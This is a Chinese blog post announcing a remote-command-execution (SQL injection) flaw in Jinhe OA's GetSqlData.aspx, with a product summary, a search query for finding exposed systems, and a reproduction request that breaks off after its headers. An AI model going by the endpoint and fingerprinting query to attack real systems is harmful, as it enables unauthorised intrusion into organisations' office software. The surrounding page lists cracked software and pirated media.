[安全防护] 金和OA GetSqlData.aspx 远程命令执行漏洞
作者:CC下载站 日期:2023-09-20 02:29:58 浏览:33 分类:web
一、漏洞简介
金和OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断的更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。金和OA GetSqlData.aspx存在SQL注入漏洞。
二、影响版本
金和OA
三、资产测绘
hunter
app.name="金和 OA"登录页面
![[安全防护] 金和OA GetSqlData.aspx 远程命令执行漏洞](https://www.cdz423.com/zb_users/upload/2023/09/20230920023025169514822511928.png)
四、漏洞复现
POST /C6/Control/GetSqlData.aspx/.ashx HTTP/1.1 Host: xx.xx.xx.xx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, def
猜你还喜欢
- 04-01 [科学上网] 直连、中转、专线机场有什么区别|良心高效专线机场推荐|hy2机场推荐
- 03-29 [web] 免费公共DNS大全(IPv6+IPv4)
- 03-29 [玩技术] CTFHUB刷题笔记
- 03-22 [AI配音] 有哪些好用的AI智能配音工具值得推荐?
- 03-15 [web] 轻松申请免费域名并绑定到个人网站 | link顶级域名
- 03-15 [运营] 亚马逊如何选品?产品市场分析怎么做?包括哪些方面?
- 03-15 [web] 3分钟,免费拥有你的专属域名——免费一级域名注册申请及域名解析教程
- 03-14 [学习] 必看!手把手教你自动续期微软E5账号,长期畅享5T OneDrive云盘!
- 03-14 [学习] 白嫖5T微软的OneDrive云盘,微软E5申请,真正的免费不限速!
- 03-14 [学习] 微软onedrive E5创建子账号,实现125T云盘空间25账号,附带Office365激活
- 03-08 [web] 手把手教你开通新加坡华侨银行OCBC账户-保姆级教程
- 03-05 [web] PT站是什么?开放注册的国外国内PT站推荐汇总
取消回复欢迎 你 发表评论:
- 精品推荐!
-
- 最新文章
- 热门文章
- 热评文章
![[小说] 【飞卢小说】2100+本合集](https://www.wpzyk.cn/upload/attach/202307/87860_AAQ95RDSGGM6HBK.png)
[小说] 【飞卢小说】2100+本合集
![[PPT模板] 160套收费高质量毕业答辩PPT模板](https://www.cdz423.com/zb_users/upload/2024/04/20240423211821171387830140483.jpeg)
[PPT模板] 160套收费高质量毕业答辩PPT模板
![[小说] 付费小说300+](https://www.cdz423.com/zb_users/upload/2024/04/20240423211057171387785712925.jpeg)
[小说] 付费小说300+
![[文章合集] 知乎盐选付费文章合集,2888部](https://www.cdz423.com/zb_users/upload/2024/04/20240423091001171383460123250.jpeg)
[文章合集] 知乎盐选付费文章合集,2888部
![[书籍] 《高分图书50部》好书共读 休闲 成长 生活一个都不能少[epub]](https://www.cdz423.com/zb_users/upload/2024/04/20240423085727171383384790764.jpeg)
[书籍] 《高分图书50部》好书共读 休闲 成长 生活一个都不能少[epub]
![[游戏娱乐] 《我的梦想卧室》v20240413中文版](https://www.cdz423.com/zb_users/upload/2024/04/20240423211307171387798748099.jpeg)
[游戏娱乐] 《我的梦想卧室》v20240413中文版
![[资料] 知识星球 付费课程(精选130篇)[PDF]](https://www.cdz423.com/zb_users/upload/2024/04/20240423080041171383044182728.jpeg)
[资料] 知识星球 付费课程(精选130篇)[PDF]
![[有声读物] 冯唐讲《资治通鉴》(完结)【MP3】](https://www.cdz423.com/zb_users/upload/2024/04/20240423024317171381139763982.png)
[有声读物] 冯唐讲《资治通鉴》(完结)【MP3】
![[电影] 2022年国产奇幻片《聊斋新传之画皮人》HD国语中字](https://www.cdz423.com/zb_users/upload/2024/04/20240423021916171380995690054.jpeg)
[电影] 2022年国产奇幻片《聊斋新传之画皮人》HD国语中字
![[书籍] 国学书籍70本(绝版珍藏)【TXT】](https://www.cdz423.com/zb_users/upload/2024/04/20240422201820171378830035422.jpeg)
[书籍] 国学书籍70本(绝版珍藏)【TXT】
![[资料] [大学期末救急课] 猴博士+高斯课堂+斐多课堂,全集视频合集](https://www.cdz423.com/zb_users/upload/2024/03/20240330212550171180515014887.jpeg)
[资料] [大学期末救急课] 猴博士+高斯课堂+斐多课堂,全集视频合集
![[云资源] 价值2万元的老男孩Python教程](https://www.cdz423.com/content/uploadfile/201807/7044a3402019825e1e6a9efe74241bf820180720203647.jpg)
[云资源] 价值2万元的老男孩Python教程
![[书库] 史上最全摄影书推荐(附700本PDF版打包下载)](https://www.cdz423.com/zb_users/upload/2024/04/20240402011121171199148142755.jpeg)
[书库] 史上最全摄影书推荐(附700本PDF版打包下载)
![[云资源] 花了一千多元买的私人健身教程](https://www.cdz423.com/zb_users/upload/2024/03/20240331010425171181826527440.png)
[云资源] 花了一千多元买的私人健身教程
![[下载工具] Internet Download Manager 6.42.7 (IDM)](https://www.cdz423.com/zb_users/upload/2024/03/20240325194507171136710766324.png)
[下载工具] Internet Download Manager 6.42.7 (IDM)
![[影视] 灌篮高手 WEB-DL版下载/Slam Dunk/スラムダンク/灌篮高手:THE FIRST/灌篮高手电影版 2022 The First Slam Dunk 61.35G](https://www.cdz423.com/zb_users/upload/2024/03/20240310103327171003800764975.webp)
[影视] 灌篮高手 WEB-DL版下载/Slam Dunk/スラムダンク/灌篮高手:THE FIRST/灌篮高手电影版 2022 The First Slam Dunk 61.35G
![[即时通讯] 腾讯QQ PC版9.7.22.29315去广告绿色纯净版](https://www.cdz423.com/zb_users/upload/2024/02/202402051707112408370795.jpg)
[即时通讯] 腾讯QQ PC版9.7.22.29315去广告绿色纯净版
![[开发环境] PhpStorm2023中文激活版v2023.3.3 正式版](https://www.cdz423.com/zb_users/upload/2024/02/20240205133351170711123128774.jpeg)
[开发环境] PhpStorm2023中文激活版v2023.3.3 正式版
![[资料] 3000 套电影电视剧 LOGO 宣传片常用音效合集包](https://www.cdz423.com/zb_users/upload/2024/02/20240216140536170806353623293.jpeg)
[资料] 3000 套电影电视剧 LOGO 宣传片常用音效合集包
![[安卓软件] 酷我音乐APP_v10.7.6.4 去广告破解豪华VIP版](https://www.cdz423.com/zb_users/upload/2023/10/20231018183151169762511161927.jpeg)
[安卓软件] 酷我音乐APP_v10.7.6.4 去广告破解豪华VIP版
[云资源] 价值2万元的老男孩Python教程
[影视] 灌篮高手 WEB-DL版下载/Slam Dunk/スラムダンク/灌篮高手:THE FIRST/灌篮高手电影版 2022 The First Slam Dunk 61.35G
[云资源] 花了一千多元买的私人健身教程
[书库] 史上最全摄影书推荐(附700本PDF版打包下载)
![[动画] 北斗神拳(1984) [两季合集] [MKV]](https://www.cdz423.com/zb_users/upload/2024/04/20240420013131171354789116711.jpeg)
[动画] 北斗神拳(1984) [两季合集] [MKV]
![[资料] 抗战阵亡将士资料+续编](https://www.cdz423.com/zb_users/upload/2024/04/20240411034831171277851194981.jpeg)
[资料] 抗战阵亡将士资料+续编
![[电视剧] 三体 (2024) 全8集 网飞版本 中文字幕 合集](https://www.cdz423.com/zb_users/upload/2024/03/20240325183741171136306189652.jpeg)
[电视剧] 三体 (2024) 全8集 网飞版本 中文字幕 合集
![[影视] 三大队 WEB-DL版下载/Endless Journey/请转告局长,三大队任务完成了 2023 三大队 6.7G](https://www.cdz423.com/zb_users/upload/2024/02/20240203180506170695470628444.webp)
[影视] 三大队 WEB-DL版下载/Endless Journey/请转告局长,三大队任务完成了 2023 三大队 6.7G
![[纪录片] 河西走廊【10集 国语 中文字幕 1080P 10.8G MP4】](https://www.cdz423.com/zb_users/upload/2024/03/20240314090934171037857429792.jpeg)
[纪录片] 河西走廊【10集 国语 中文字幕 1080P 10.8G MP4】
![[安卓软件] OfficeSuite中文版APP v14.2.50872.0破解版](https://www.cdz423.com/zb_users/upload/2023/12/20231208024844170197492476060.png)
[安卓软件] OfficeSuite中文版APP v14.2.50872.0破解版
- 最新评论
-
好东西阿zfy123123 评论于:04-18 谢谢楼主xiaoqi 评论于:04-12 勿在线解压,勿手机解压,请在电脑上用最新款压缩软件解压!推荐360压缩或者好压CC下载站 评论于:04-10 
无法解压啊,客服能不能给个解压教程ravengrey 评论于:04-10 谢谢支持!!CC下载站 评论于:03-26 很棒的资源,感谢分享云体风身 评论于:03-26 感谢分享,好东西云体风身 评论于:03-26 谢谢支持!CC下载站 评论于:03-14 央视精品,感谢付出提供。qwer9009 评论于:03-14 谢谢支持!!!CC下载站 评论于:03-13
- 热门tag